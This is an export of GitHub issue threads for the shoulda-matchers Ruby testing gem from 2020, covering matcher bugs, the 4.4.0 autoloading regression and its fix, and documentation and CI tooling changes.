`webpacker` is included by default in Rails 6.0+ which doubles our build time for this Rails version.
As `webpacker` is out of the scope of `shoulda-matchers`, it can be removed in favour of fewer dependencies and faster CI
times.

Some related code that can help your contribution:

- Remove webpacker from Appraisals
https://github.com/thoughtbot/shoulda-matchers/blob/0b23942feb1166678c85c015f875f

[2020-06-25 15:58] adamhannadev commented on #1311
May I give this issue a try? I think it's a perfect practice for a proper contribution.

[2020-06-25 16:08] mcmire commented on #1311
@adamhannadev Yes, go for it!

[2020-06-25 16:59] adamhannadev commented on #1311
Thanks a lot. Can you recommend a location to store tests to make sure these files have had the right text added to/removed from them?

[2020-06-27 01:31] mcmire commented on #1311
@adamhannadev Just took a look at your PR!

[2020-07-03 16:30] thoraxe opened #1313 "validate_uniqueness_of with multiple scopes results in ActiveRecord::InvalidForeignKey"
A model:
[code]

A test:
[code]

A test run:
[code]

I am not sure if this is user error. Creating two RelevanceLabel objects with the same foreign keys results in the correct behavior (it doesn't work):

[code]

But, I definitely could be doing something wrong. I'd bet that over a bug in Shoulda.

[2020-07-04 23:16] mcmire commented on #1313
Hey @thoraxe! So oftentimes when using validation matchers, you need to start with a record that is pre-populated with attributes that put that record in more of a valid state. This is especially the case with `validate_uniqueness_of`, because it works differently from other matchers in the sense that there are two objects that are involved, a record already in the database that has a certain set

[2020-07-06 12:19] thoraxe commented on #1313
OK, user error!

Adding the following in my `before` block:

[code]

And then adding your `subject` stanza:

[code]

These all pass now.

Sorry for the noise! I will look back at the docs and see if there is a way to improve them so people like me don't open these issues :)

[2020-07-06 12:19] #1313 closed

[2020-07-06 12:20] thoraxe commented on #1313
https://github.com/thoughtbot/shoulda-matchers#on-the-subject-of-subject

It's written very plainly right here.

Le sigh. Sorry for the noise.

[2020-07-06 15:32] mcmire commented on #1313
Haha, no worries :) Glad your tests pass now!

[2020-07-09 16:30] juniorjp opened #1315 "allow_value throwing error after Rails update"
Hi, I have my test like this:

[code]

It was working on Rails 4.2, now I'm getting an error on Rails 5.0:

[code]

Also:
[code]

Now is throwing:
[code]

Is there a new API for these cases?

[2020-07-11 04:02] mcmire opened #1317 "Use autoloading instead of requiring all files up front"
We have a lot of files which are like [active_record.rb](https://github.com/thoughtbot/shoulda-matchers/blob/f50f70e9c8679b4e3625f445478743df875616c9/lib/shoulda/matchers/active_record.rb) where there are a bunch of `require`s at the top of the file. I've never liked this because there are different files at different levels being required. This is not as organized as it could be, and if you add a

[2020-07-11 04:14] VSPPedro commented on #1317
Hi, @mcmire, I would love to work on this!

[2020-07-11 04:50] mcmire commented on #1317
@VSPPedro Okay, that would be awesome! I will assign this to you :)

[2020-07-11 06:35] mcmire commented on #952
Reopening this issue since it depends on a PR.

[2020-07-11 09:01] #952 closed

[2020-07-11 09:07] VSPPedro commented on #1317
Thanks!

[2020-07-11 17:38] mcmire commented on #1114
Reopening since this is dependent on a PR.

[2020-07-11 17:39] mcmire commented on #1007
Reopening since this is dependent on a PR.

[2020-07-12 07:28] mcmire commented on #1198
Closing this issue because of missing context for the original problem posted.

[2020-07-12 07:28] #1198 closed

[2020-07-12 07:30] mcmire commented on #1283
Closing this since the issue seems to be resolved, but feel free to comment otherwise.

[2020-07-12 07:30] #1283 closed

[2020-07-12 07:46] mcmire commented on #1315
Hi @juniorjp. So this isn't shoulda-matchers doing, but this is due to fundamental changes that were made to ActiveRecord between Rails 4.2 and 5.0 which prohibit you from setting a numeric column to a non-numeric value. (You can read more about it here: https://github.com/rails/rails/pull/27429.) We've seen something like this issue before; [this commenter](https://github.com/thoughtbot/shoulda-m

[2020-07-12 16:51] mcmire commented on #646
A fix for this is now in master: https://github.com/thoughtbot/shoulda-matchers/commit/c0a1578435f66d6fbf0db1164205bd8d99f6aa2f

[2020-07-12 16:51] #646 closed

[2020-07-12 17:14] mcmire commented on #625
I'm going to close this issue since this is pretty rare and (although I can't say for certain) I don't think it's the fault of shoulda-matchers. The `have_and_belongs_to_many` matcher simply asks the Reflection object for the association what table name it thinks is associated. If you think the matcher has got it wrong you can override the join table name using `have_and_belongs_to_many(...).join_

[2020-07-12 17:14] #625 closed

[2020-07-12 17:15] #1187 closed

[2020-07-12 22:21] juniorjp commented on #1315
It worked upgrading to version 5.0.5 thank you!

[2020-07-12 22:21] #1315 closed

[2020-07-13 02:05] mcmire commented on #1315
Woohoo! Glad you got it working.

[2020-07-21 00:55] mcmire commented on #814
I've been noodling on this the past few days. The reason why we haven't tackled this problem yet is it's a difficult problem, and it's difficult because because associations are way more variable than non-associations. The most complicated part of the uniqueness matcher is that it needs to generate unique values for the attributes that are involved in the validation (or at least the ones you care

[2020-07-23 10:49] ravicious commented on #951
In my case someone added `rails_helper.rb` to the project with Shoulda::Matchers configuration, but that helper wasn't required in any test file, so the method wasn't found.

I ended up just adding the Shoulda::Matchers config to `spec_helper.rb`, though in general it's recommended to have separate rails_helper and spec_helper. https://github.com/everydayrails/rails-4-1-rspec-3-0/issues/36#issueco

[2020-07-23 22:28] allisonphillips opened #1321 "has_and_belongs_to_many .join_table not working with symbolized table name"
I am experiencing errors when trying to add shoulda matcher specs for `has_and_belongs_to_many` relationships for classes that are not dependent on any gem. At first I thought I had forgotten to configure something, but then I reproduced by writing the same example for similar classes that has long been functioning in a production environment without issue. All this syntax works:

[code]

But as s

[2020-07-23 22:29] allisonphillips commented on #625
Done, see https://github.com/thoughtbot/shoulda-matchers/issues/1321. Thank you!

[2020-07-25 06:12] mcmire commented on #1321
Thanks for submitting this separately! I've got a fix for this in #1323.

[2020-07-25 23:28] #1321 closed

[2020-07-28 17:53] gmmcal commented on #814
TBH, not sure how I feel with this approach compared to doing this myself without using this gem. A test itself would not be that much different than your dummy code, and I think it might even be easier to understand in the future. Taking your example:

[code]

[2020-08-03 13:58] JorgeLeites opened #1325 "have_and_belong_to_many matcher doesn't seem to find join table"
I was adding user groups to my app and I'm having the following issue:

## Spec
[code]

## Model
[code]

## Schema
[code]

And the test fails with the message: `Expected Group to have a has_and_belongs_to_many association called users (join table groups_users doesn't exist)`

Am I missing something?

[2020-08-03 16:11] mcmire commented on #1325
I'm not certain. Is the table in your test database? What happens if you run `rails db:test:prepare`?

[2020-08-03 16:55] JorgeLeites commented on #1325
I'm astonished. It didn't seem to do anything, but the problem went away. Do you think that was the problem?

[2020-08-03 16:56] JorgeLeites commented on #1325
I'm closing the issue since it seems like it was a problem on my behalf.

[2020-08-03 16:56] #1325 closed

[2020-08-06 23:14] pgiblock commented on #929
Same issue here. I get
[code]

With binding.pry() in my `def foo_params` which is called by the FooController, the execution never halts.

Furthermore, given these two test cases:
[code]
The first one fails and the second one succeeds.

Running shoulda-4.0.0.

[2020-08-06 23:22] mcmire commented on #929
@pgiblock Since this is an old issue now, would you mind making a new issue to represent this so we can track it better? Additionally if you wouldn't mind sharing what's inside of your `update` method that would help me figure out why that test is failing.

[2020-08-07 01:32] pgiblock commented on #929
Sure thing. I put a `binding.pry` as the first line in my `update` method, so I'm not sure that the body of if it even matters if the method isn't even being executed.

[2020-08-07 22:32] pgiblock opened #1326 "`permit` matcher should be able to perform negative testing."
shoulda-matchers-4.3.0
Strong parameters were introduced as a replacement for ActiveRecord protected attributes (`attr_accessible`). That is, a way to whitelist which attributes should be accepted (simply moved the concern from model to controller). The `permit` matcher does a good job ensuring that all expected parameters are permitted. However, it doesn't seem to support ensuring that unauthoriz

[2020-08-24 01:54] aesyondu opened #1327 "[Question] How to validate_absence_of enum attribute?"
I have a similar structure code as https://github.com/thoughtbot/shoulda-matchers/issues/946, and I'm trying to find a way to validate absence of an enum value.

Model:
[code]

I tried this but it showed an error `ArgumentError: 'an arbitrary value' is not a valid my_attribute`:

Rspec:
[code]

I also tried the `with` method but it doesn't exist on the validate_absence_of matcher (`NoMethodError:

[2020-08-24 03:19] mcmire commented on #1327
Hi there! You can continue to use `validate_absence_of`, but you need to set up your `subject` to satisfy the condition.

I think it would help you to understand what `validate_absence_of` does under the hood. Your test:

[code]

can be expanded like so:

[code]

So if you had this test, and you only wanted to run it when some condition was satisfied, how would you accomplish this? You would proba

[2020-08-24 03:51] aesyondu commented on #1327
Thanks for the response. I forgot to mention that my snippet is already surrounded by a context, subject, and other validations.

[code]

I used your suggested alternative instead, not sure why I didn't think of that, many thanks!

[2020-08-24 03:51] #1327 closed

[2020-08-24 22:18] mcmire commented on #1311
This is merged so I'll close this PR.

[2020-08-24 22:18] #1311 closed

[2020-08-24 22:19] mcmire commented on #1305
I'm going to close this to keep the issues list lean but I'm happy to reopen it if this is still useful.

[2020-08-24 22:19] #1305 closed

[2020-08-25 12:41] marcelolx opened #1330 "Does shoulda-matchers not support alias_attribute?"
I'm working on a project where the database fields are in pt-BR, but in our rails project which uses this database our convention is to use `alias_attribute` to use this fields all in english, but shoulda-matcher seems to not be able to get the field type when it validates numericality based on his alias.

I've created a sample simulating this here https://github.com/marcelolx/shoulda-matchers-tes

[2020-08-25 18:11] mcmire commented on #1330
So this is less that your attribute is an alias of another attribute and more to do with the fact that your attribute is a numeric column. This is a common problem with `validate_numericality_of` that I swear we fixed but I guess we haven't. The matcher works fine with string columns, but numeric columns typecast incoming strings to numbers, so it throws the matcher off. This is not a problem with

[2020-08-25 18:52] marcelolx commented on #1330
But in the sample who i provided, i've two numeric fields [value](https://github.com/marcelolx/shoulda-matchers-test-apps/commit/03559d8a181a70b8453f29cc5534452c8047119a#diff-05c7192a2cc6883f7f5338acad624461R19) and [cambio](https://github.com/marcelolx/shoulda-matchers-test-apps/commit/03559d8a181a70b8453f29cc5534452c8047119a#diff-05c7192a2cc6883f7f5338acad624461R20), the [tests referring `value`

[2020-08-25 19:16] mcmire commented on #1330
@marcelolx Oh I see... right. Thanks for reproducing this in the example repo! I think you must be right about the alias attribute then. I have no clue why that wouldn't work, there's nothing special that we do in regard to aliases. But I will look further into this. Maybe it is something small.

[2020-08-25 19:32] marcelolx commented on #1330
@mcmire Great! Maybe is something with rails 🤔 Tonight I'll look a little bit more deeper to see why that is happening, maybe I will be able to discover something who can help you on this.

[2020-08-26 06:42] prrrnd opened #1331 "have_one with dependent is no longer working from 4.4.0"
Using `dependent` on a `have_one` matcher doesn't seem to work on 4.4.0, but worked on 4.3.0.

[code]

[code]

[2020-08-26 06:43] baburdick opened #1332 "v4.4.0 NoMethodError: undefined method `belong_to'"
With the release of v4.4.0, I'm seeing test failures with errors resembling this:
[code]
Reverting to the prior release fixes the issue.

[2020-08-26 06:53] Volosh1n commented on #1331
Same with `have_many`:
[code]

[2020-08-26 07:34] sandro-aboutsource opened #1333 "v4.4.0 introduces undefined method errors"
After upgrading to version 4.4.0 we see errors like
[code]
in many projects. It is the same in Rails and non Rails projects.

As I see some similar issues (#1332 and #1331) it might be a general problem. Maybe it has to do with https://github.com/thoughtbot/shoulda-matchers/pull/1320?

[2020-08-26 08:19] jarkko commented on #1332
Ditto. Seems like pretty much all the association matchers broke for us.

[code]

[2020-08-26 10:53] arthurborisow commented on #1332
Faced the same issue. Seems like the problem with autoloading. When just writing `Shoulda::Matchers::ActiveRecord::AssociationMatcher` and `Shoulda::Matchers::ActiveRecord::AssociationMatcher` before the tests resolve the issue but that's ugly

[2020-08-26 11:07] denisj commented on #1332
Same here. So this might be this [commit](https://github.com/thoughtbot/shoulda-matchers/commit/ce78101362d8826d0bfaf4e7935aa0643f3e4c53#diff-a629c86e49f9eabce177fbd99635ae8a)?

[2020-08-26 12:35] n-rodriguez commented on #1332
why not using [Zeitwerk](https://github.com/fxn/zeitwerk)?

[2020-08-26 13:53] timlapluie commented on #1332
It seems to be a feature, not a bug.

The release notes of `4.0.0` contain the following:
[code]

[2020-08-26 13:55] Volosh1n commented on #1332
@timlapluie but everything was fine in 4.3.0

[2020-08-26 13:57] timlapluie commented on #1332
@Volosh1n sorry, messed up the version number. This feature has been added with `4.4.0`. Updated my comment above.

[2020-08-26 14:00] arthurborisow commented on #1332
@timlapluie *all* the matchers don't work. Validations as well. Besides, have you read the error message in first comment? How come that undefined method is a proper error? Also, have you read my comment where the fix is pretty simple but stupid?

[2020-08-26 14:04] jarkko commented on #1332
Nope, this breaks all association marchers, not just through associations.

[2020-08-26 14:15] KapilSachdev commented on #1332
As @denisj mentioned, its because of the above mentioned commit change from require to autoloading the constants.
It would be good to just use `4.3.0` for now until fixed.
For verifying it just require association matchers and similar files in your `spec_helper` in case using rails.

[code]
_Just for verification_

[2020-08-26 15:59] VSPPedro commented on #1333
Thanks for sharing this!

I'll take a look.

@mcmire, I'd like to have a question cleared up, please.

I'm wondering if I should revert the changes made by the #1320 or if I should create tests to replicate the problem and then fix without removing the autoloading.

What are your thoughts on this?

[2020-08-26 16:09] VSPPedro commented on #1332
Thank you all for the information shared here.

I will send a correction as soon as possible.

[2020-08-26 16:17] mcmire commented on #1333
@VSPPedro I think for now let's just revert the commit. I took some time this morning to look into why it was that the test suite passed yet this issue occurred, and the problem is that we aren't exercising ALL of the matchers in the integration tests (we never have been, I guess). We do test a lot more of the matchers in the [tests for Shoulda](https://github.com/thoughtbot/shoulda/blob/master/te

[2020-08-26 16:48] VSPPedro commented on #1331
Thank you for creating this issue.

There is already a PR to solve this problem.

Soon, we will have a new release with this fix.

[2020-08-26 16:52] #1333 closed

[2020-08-26 17:35] mcmire commented on #1332
Fixed in v4.4.1. Sorry everybody!

[2020-08-26 17:35] #1332 closed

[2020-08-26 17:36] mcmire commented on #1331
Fixed in v4.4.1!

[2020-08-26 17:36] #1331 closed

[2020-08-26 17:36] mcmire commented on #1333
Fixed in v4.4.1!

[2020-08-26 17:54] n-rodriguez commented on #1317
@mcmire why not using [Zeitwerk](https://github.com/fxn/zeitwerk)?

[2020-08-26 18:15] mcmire commented on #1317
@n-rodriguez I'm not sure that Zeitwerk would be a good choice here. It seems like it's really well suited for applications, but it seems overkill for gems IMO. It would have to be added as a runtime dependency and I don't feel like people should have to bring in Zeitwerk to use shoulda-matchers.

[2020-08-26 18:38] mcmire opened #1336 "Generating documentation no longer works"
We use Pygments along with YARD to highlight source code in documentation. Unfortunately this seems to have stopped working and upon running `yard doc` (which happens automatically when creating new releases) we are getting:

[code]

This seems to have been a [problem](https://github.com/tmm1/pygments.rb/issues/45) for a very long time and there is no known solution.

Perhaps instead of Pygments w

[2020-08-26 21:10] n-rodriguez commented on #1317
IMO this PR is the perfect use case for Zeitwerk since you do exactly what it does.

[2020-08-27 00:32] VSPPedro commented on #1317
@mcmire First, sorry for the problems with the PR and thank you for releasing the fix so fast.

For now, I will focus on adding the tests first, as described by you here: https://github.com/thoughtbot/shoulda-matchers/issues/1333#issuecomment-680980460. After adding these tests I will continue with this PR - if that's okay with you.

[2020-08-27 01:07] mcmire commented on #1317
@VSPPedro Yeah, that's fine with me!

[2020-08-27 08:02] afdev82 opened #1337 "JoinTableMatcher doesn't find join tables with schema"
I'm trying to have a test for a HBTM association where the join table name includes the schema:

The problem that I found is that if I include the schema in the test (as it should be), the JoinTableMatcher doesn't find the table in the list of tables provided by ActiveRecord.
I think the problem is that the [tables_and_views method](https://github.com/thoughtbot/shoulda-matchers/blob/master/lib/sh

[2020-08-27 09:51] KapilSachdev commented on #1336
Is this a system specific issue or an intermittent issue and happens sometimes?

BTW, [Rouge](https://github.com/rouge-ruby/rouge) looks great and would be a good replacement.

[2020-08-27 15:04] mcmire commented on #1336
@KapilSachdev I don't know if it's a system specific issue, but it's definitely repeatable on my machine (Mac). Previously there was an issue with using Python 3 vs. Python 2 — I believe I cleared that up, so there was a long stretch where it did work for a while. But now within the past 6 months I'd say, I've started receiving this error.

[2020-08-27 15:11] mcmire commented on #1337
Oh, interesting. We previously received an issue, #625, which I think is related to this, and at the time I didn't know what was going on here. If `tables_and_views` doesn't include the schemas, though, then that would make a lot of sense. That said, I don't really know what the solution here would be. So if you can figure something out, then we would certainly be glad to incorporate it into the g

[2020-08-27 15:31] KapilSachdev commented on #1336
Then the alternative would be a better way to go.

However, we can also create a docker image and try to use the image for release, but that would be an overkill and also we can't be sure if it wouldn't appear in the image.

[2020-08-27 15:43] afdev82 commented on #1337
Hi, yes I saw that issue too.
I was not 100% it was directly related, so I opened a new issue.

I'm in the same situation, I don't know what should be the solution.
I think the best would be to find a way to get the schemas with the table names, but I don't know how yet, since we are simply using ActiveRecord methods.
Maybe this is an issue with ActiveRecord that could be raised there.

[2020-08-27 16:36] ivancortesromero commented on #890
Hi @mcmire, I have `Shoulda::Matchers.configure` block in my `rspec_helper.rb` and the error is raised.

gem version: 4.4.0
rails version: 6.0.3

[2020-08-27 17:29] mcmire commented on #890
Hi @ivancortesromero, 4.4.0 had a regression in it where matchers did not get included into example groups. If you switch to 4.4.1 then the issue should be fixed.

[2020-08-27 18:51] KapilSachdev commented on #1336
Looks good too.

#### With pgyments
![pgyments](https://user-images.githubusercontent.com/16557539/91482773-38a82880-e8c4-11ea-9d03-cc76c534761f.png)

#### With rouge
![rouge](https://user-images.githubusercontent.com/16557539/91482779-3c3baf80-e8c4-11ea-92e6-59739886d401.png)

[2020-08-27 20:10] mcmire commented on #1336
Oh nice — do you have it working where it's swapped out in the YARD config, or were you just testing it out on something else?

[2020-08-28 05:34] KapilSachdev commented on #1336
Changed the yard setup `doc_config/yard/setup.rb` to use `rouge` instead of `pygments.rb`.

[code]
As  the only language being used was `ruby`, so I used `Rouge::Lexers::Ruby` as opposed to defining the constant from `language` for testing.

Can you clarify what the below substitution is doing?
[code]

[2020-08-28 15:09] mcmire commented on #1336
@KapilSachdev Very nice, that makes sense. IIRC, Pygments was adding some additional HTML that was making it more difficult to apply CSS to the code blocks, so I got rid of that. I'm not sure if Rouge does the same thing or not.

[2020-08-28 15:42] KapilSachdev commented on #1336
It is visible when using `pygments.rb` and removing that substitution.

![pygments_sub](https://user-images.githubusercontent.com/16557539/91586084-87ac9700-e972-11ea-8543-cb5b50eb93d2.png)

Adding or removing the block does not change anything using rouge.

[2020-08-28 15:54] mcmire commented on #1336
Ah yup, there you go, that's what it was. I knew it was something CSS-related.

[2020-08-29 11:01] gee-forr opened #1342 "Documentation on Shoulda Matchers site has incorrect id anchors"
Hi all,

Thank you for this wonderful lib - it really provides me such peace of mind that the basics are taken care of. Much appreciation :)

The [documentation on the main should site](http://matchers.shoulda.io/docs) has incorrect id anchor tags, and therefore they do not work at all. An example:

* ActiveModel::Matchers links to http://matchers.shoulda.io/docs/v4.3.0/#activemodel-matchers
* The

[2020-08-29 14:02] KapilSachdev commented on #1342
Looks like there are two table of contents on the page, one hidden with correct anchor and id links and another which is visible with wrong ones.

Readme uses markdown and the repo generates documentation using yard.

There are known issues with yard and markdown being incompatible and links are the one of the incompatibility.

I think what  @mcmire tried was to counter that incompatibility by gen

[2020-08-30 03:33] mcmire opened #1345 "Replace Hound with GitHub Action"
In the past, this gem was using Hound (developed by some now ex-thoughtbotters) to run code through Rubocop. However, it doesn't seem to be maintained much these days — I actually disabled Hound a while back because it started choking on new versions of Rubocop, starting with the Rubocop team's decision to spin `rubocop-rails` off. Since then GitHub Actions has emerged as a more built-in solution

[2020-08-30 04:07] mcmire commented on #1342
Thanks for looking into that @KapilSachdev. It's been a long time since I wrote `app.js` and I'm having trouble remembering what my intent was for `generateTOC`, although clearly, it doesn't do anything, otherwise I imagine you'd see a sidebar or something (perhaps it's disabled on certain pages).

It's true that we use YARD to generate documentation. YARD has the ability to convert Markdown into

[2020-08-31 16:27] KapilSachdev commented on #586
@mcmire What can be done to resolve this issue?

[2020-08-31 18:42] mcmire commented on #586
@KapilSachdev We would need to update the `delegate_method` matcher so that instead of merely handling the case in which the argument passed to `to` is a reference to another method on the same class (in the form of a symbol), we also account for when that argument is another class/module altogether. I don't foresee any real difficulty in doing this, it's just been sitting on the back burner.

[2020-09-01 00:44] mcmire commented on #1326
Hey @pgiblock, sorry for the delay in answering. I think you raised some valid issues but I wanted to make sure we are on the same page.

First, you say "the point of strong parameters is to restrict parameters so they are not unintentionally passed into `#assign_attributes`, etc. This should be caught because the client could have done something evil." I fully agree with this, but it sounds there

[2020-09-01 00:47] mcmire commented on #814
@gmmcal Coming back to this again. Based on the feedback, it sounds like this issue is not really solvable, or at least that the solution would not be that useful. Do we need to add some documentation around this? Or maybe the gem should raise an explicit error if an attempt is made to use an association for the attribute or scope with an example of the test that should be written instead?

[2020-09-01 07:20] KapilSachdev commented on #586
Thanks for the feedback.
I'm not familiar with the source code, but will try to resolve it.

[2020-09-01 12:40] VSPPedro opened #1346 "Remove allow_mass_assignment_of matcher"
I found this [commit](https://github.com/thoughtbot/shoulda-matchers/commit/c1a81d4b132a9e6091c42c3ebcd3144fc593c016) and after reading the description I decided to create this issue so that we do not forget about this change.

I think this can be tagged as 'Beginner Friendly'.

I'm not entirely sure if we want this change now or maybe later with a major release.

[2020-09-01 15:20] #1336 closed

[2020-09-01 15:21] mcmire commented on #1342
Just looked again at YARD and it looks like 0.9.25 includes an update to Redcarpet which adds ids to the headers. It may be a good idea to investigate that: https://github.com/lsegal/yard/blob/main/CHANGELOG.md#0925---may-3rd-2020.

[2020-09-01 16:22] KapilSachdev commented on #1342
Yes, it fixes the issue reported.
One more interesting change.
Before update
[code]

After upgrade
[code]

[2020-09-01 17:22] #1342 closed

[2020-09-01 17:24] mcmire commented on #1342
@KapilSachdev Yeah, I'm not sure what they changed in YARD, but whatever it was, it works much better now 👍

[2020-09-02 10:41] gee-forr commented on #1342
Nice - thanks so much all :)

[2020-09-02 21:03] gmmcal commented on #814
@mcmire I think a change on README and/or code documentation explicitly stating this scenario is not supported and point to this issue would be enough. Making the code raise an exception for this could be easier to understand, for sure, but I'm not sure how many people face this on a daily basis and if it is worth the effort, unless you could build this within a few minutes (I have not checked tha

[2020-09-02 22:40] mcmire commented on #814
@gmmcal Okay, yeah, I'm not sure adding an exception would be a 5-minute job so updating the documentation makes sense to me.

[2020-09-03 05:37] gmmcal commented on #814
Will create a PR then

[2020-09-07 07:02] KapilSachdev commented on #611
I can verify that the reported issue has been fixed in the version `4.4.1`, so we can close this issue for now.

Before:
[code]
After:
[code]
_Error text differs as i'm using rails `6.1.0.alpha`_

[2020-09-07 19:51] mcmire commented on #611
Thanks! Closing.

[2020-09-07 19:51] #611 closed

[2020-09-07 20:03] KapilSachdev commented on #1114
@mcmire seems like this issue is also fixed in the PR mentioned, and will be good to close.

[2020-09-08 00:57] mcmire commented on #1114
@KapilSachdev Oops, good eye! Will close.

[2020-09-08 00:57] #1114 closed

[2020-09-11 22:28] utkarsh2102 opened #1353 "Drop `git` in gemspec"
Hiya,

Thanks for your lovely work on this! ❤️

However, whilst trying to maintain this in Debian, we found that this library relies on `git` to produce a list of files.
Using `git` in gemspec is a bit troublesome and it's best to not use them!

More about this can be found here: https://docs.rubocop.org/rubocop-packaging/cops_packaging.html#packaginggemspecgit

If you agree with this, I'll be ver

[2020-09-11 22:55] mcmire commented on #1353
Hi @utkarsh2102. For context, the gemspec was originally created using Bundler. My guess as to why `git` was added to the gemspec was to prevent uncommitted changes from being released. I just checked Bundler, however, and it seems that `rake release` already checks against this. Therefore, I can't see a reason why we would need to use `git` in the gemspec. So I'd be fine with a PR that simplifies

[2020-09-11 23:13] utkarsh2102 commented on #1353
Awesome, thanks!
We're working with the Bundler team to avoid using `git` by default (bundler itself doesn't use git!). And also, bundler now won't let you release if you have uncommitted changes, so it's pretty safe that way, too!

I'll work on the PR now :)

[2020-09-13 01:41] #1353 closed

[2020-09-14 22:22] DiegoOrejuela commented on #589
@mcmire Hi. I am a bit confused about this. I think the expected behavior is that it identifies the foreign key that the relationship should have based on where the class is located. In the case of `Company::Project::Group` the default foreign key is `company_project_group_id` . So I think it could be something that could be improved.

[2020-09-14 22:29] mcmire commented on #589
@DiegoOrejuela It sounds like the OP was able to solve his problem, so that's why I closed this particular issue, but it's possible there is still a bug here — I would need more information to know for sure. So if you are getting this error I think what would be most helpful is a complete example of the association in your model and the tests you have in your test file. Preferably also in a new is

[2020-09-15 18:21] #814 closed

[2020-09-17 10:10] kiskoza opened #1357 "have_many(:model).validate(false) causes a false positive test"
I run into a problem where I had to make sure that an association has a `validate: false` on the association. I started it with writing a test for it, but it passed immediately without making the required code change.

I created this code snippet to reproduce the issue: https://gist.github.com/kiskoza/da2b4a0ba6930e9454403ea36e3fd73c

I think the problem is that in my case there weren't a `validat

[2020-10-07 07:04] StefSchenkelaars commented on #586
It's also related to #889 which is the case that you can't delegate to an instance variable either while the actual method does support this. So if any work is done on this issue it might be an idea to also take that case into account.

[2020-10-14 00:46] marcelolx commented on #1330
@mcmire I was looking on this and found the root cause of this, don't seem to be entirely related to shoulda-matchers.

First change I've made was on these methods [attribute_is_active_record_column?](https://github.com/rails/rails/blob/6-0-stable/activemodel/lib/active_model/validations/numericality.rb#L32) and [column_type](https://github.com/thoughtbot/shoulda-matchers/blob/master/lib/shoulda/m

[2020-10-14 15:08] mcmire commented on #1330
Thanks for the detailed investigation! It doesn't surprise me to hear about `_before_type_cast` — this is something that the numericality matcher in shoulda-matchers does not account for, so if the error truly is in shoulda-matchers then that would make sense. I'm curious to hear what else you find, however.

[2020-10-15 12:23] marcelolx commented on #1330
@mcmire Sorry the delay, I've made a fix on rails https://github.com/rails/rails/compare/master...marcelolx:fix_read_attribute_before_type_cast_for_aliased_attributes?expand=1 and soon (maybe tomorrow 😅) I'll open a PR explaining the problem. If the PR will be merged I think than we can make new tests and see if we need fix something on shoulda-matchers.

[2020-10-19 18:16] marcelolx commented on #1330
@mcmire I think we can close this issue, I've sent a PR https://github.com/rails/rails/pull/40395 to rails and now the described problem in this issue doesn't happens anymore.

My only concern is that shoulda-matchers is not able to get the column type here https://github.com/thoughtbot/shoulda-matchers/blob/master/lib/shoulda/matchers/active_model/validate_numericality_of_matcher.rb#L520 when the

[2020-10-19 18:44] mcmire commented on #1330
Nice work on merging that into Rails! You're right about `column_type`, I can see that not working with an aliased attribute. You're free to take a crack at solving that problem or not — if everything works for you then feel free to close this and maybe someone else can pick that up. Or whatever you want to do :)

[2020-10-19 20:24] marcelolx commented on #1330
@mcmire I'll take a look on the codebase to see if there is a way to simulate a problem because `column_type`, if there isn't I'll close this issue.

Thanks!

[2020-10-20 22:15] glenpike opened #1362 "have_one_attached matcher is failing"
Loving your library for testing, but I have the following issue.

Given I have run the ActiveStorage migration and I have the following model setup:
[code]

I would expect the following assertions to both pass:
[code]

I get the following output from my tests:

[code]

The console says:
[code]

If I'm writing my test wrong, please can someone add some example 'test' documentation to (https://githu

[2020-10-20 23:17] mcmire commented on #1362
Hi @glenpike. Which version of shoulda-matchers are you using?

[2020-10-22 18:37] glenpike commented on #1362
Hi,  apologies, I had not updated my Gems correctly.  Was trying to run 4.4.1 - working now.  Thanks.

[2020-10-22 18:37] #1362 closed

[2020-10-22 18:54] mcmire commented on #1362
No problem!

[2020-10-23 22:54] stefanwork opened #1363 "Rubygems changelog link does not work"
The Changelog link on https://rubygems.org/gems/shoulda-matchers goes to https://github.com/thoughtbot/shoulda-matchers/blob/master/NEWS.md, which does not work. It should be updated to https://github.com/thoughtbot/shoulda-matchers/blob/master/CHANGELOG.md.

[2020-10-23 23:36] mcmire commented on #1363
Good catch. Want to submit a PR to fix this?

[2020-10-23 23:52] stefanwork commented on #1363
I searched for "[NEWS.md](https://github.com/thoughtbot/shoulda-matchers/search?q=NEWS.md)" but came up empty. It doesn't look like it is defined in the gemspec, right? Is it not a thing on the rubygems website?

Oh... looks like it may already have been fixed? https://github.com/thoughtbot/shoulda-matchers/commit/c4f9add764d9ceb0f24cc6b18b9004d5acbfd9bf

[2020-10-26 14:54] mcmire commented on #1363
Oops, yes! It already got fixed and will propagate in the next version bump (which I think can happen relatively soon).

[2020-10-28 16:35] timkrins commented on #682
To anyone else coming across this issue, I fixed my problem by creating a record with zero for an ID (so when shoulda-matchers assigns the zero as a dummy value, the foreign-keyed model exists in the test database)

[2020-10-30 15:23] mcmire commented on #1247
`context` is a part of shoulda-context. We updated the `shoulda` gem a little while ago to support Rails 6, so you should be able to replace `shoulda-matchers` with `shoulda` and be able to use `context`.

[2020-10-30 15:35] mcmire commented on #1247
Okay, sanity check. Which version of shoulda-context is being brought in?

[2020-10-30 16:47] mcmire commented on #1247
Right. So `shoulda-matchers` does not provide support for using `should` like that in Minitest::Test or ActiveSupport::Test subclasses. It merely provides the matchers that you can use. The `should` and `context` functionality is provided by `shoulda-context`. You will need to include that gem as well in order to use that. Or, simply add `shoulda` (instead of `shoulda-matchers`) in your Gemfile an

[2020-11-02 15:54] mcmire commented on #1247
@mrjonesbot Ah, no worries, glad you figured it out!

[2020-11-03 17:08] KapilSachdev commented on #1363
I think we can close this as it was already resolved in #1338 , and will be available in next release.

[2020-11-03 17:38] mcmire commented on #1363
Yeah that's fair. Closing now.

[2020-11-03 17:38] #1363 closed

[2020-11-03 17:59] KapilSachdev commented on #1345
How do you want to implement this, with a third party marketplace tool or a simpler flow maintained by self.

Third party Marketplace tool example
https://github.com/KapilSachdev/shoulda-matchers/pull/1/checks?check_run_id=1348979287

If we create one ourselves
https://github.com/rails/rails/runs/1348960136?check_suite_focus=true

[2020-11-03 18:27] mcmire commented on #1345
I'm not sure which PR that build is assigned to, but I found this one https://github.com/rails/rails/actions/runs/343607226 which is tied to this PR https://github.com/rails/rails/pull/40404. I like how Hound would add comments to the PR at the places where the violations failed to let contributors (and maintainers) know why the Rubocop check is failing; otherwise, it seems like those violations w

[2020-11-03 18:52] KapilSachdev commented on #1345
Seems good.
`lint-action` seems to be doing want you want.
I think we can try this one for a while and may change later in case needed.

[2020-11-06 06:48] orenyk opened #1374 "with_foreign_key modifier fails with no error message"
Steps to replicate:

[code]

The test passes but if I change the argument of `with_foreign_key` to anything else (e.g. `baz_id`) the spec fails with the following error message:

[code]

